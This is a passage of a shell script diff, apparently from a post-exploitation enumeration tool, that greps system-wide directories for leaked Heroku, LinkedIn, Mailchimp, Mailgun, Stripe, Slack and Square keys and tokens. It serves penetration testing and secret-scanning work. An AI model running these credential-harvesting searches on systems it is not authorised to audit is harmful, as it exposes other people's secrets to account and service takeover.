"[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +wait +print_3title "Searching LinkedIn Client ID (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +wait +print_3title "Searching LinkedIn Secret Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +wait +print_3title "Searching Mailchamp API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +wait +print_3title "Searching Mailgun API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +wait +print_3title "Searching Picatic API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +wait +print_3title "Searching Slack Token (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +wait +print_3title "Searching Stripe API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~k_live_[0-9a-zA-Z]{24}~${SED_RED}~" & +wait +print_3title "Searching Square Access Token (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sqOatp-[0-9A-Za-z_\-]{22}~${SED_RED}~" & +wait +print_3title "Searching Square Oauth Secret (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "sq0csp-[ 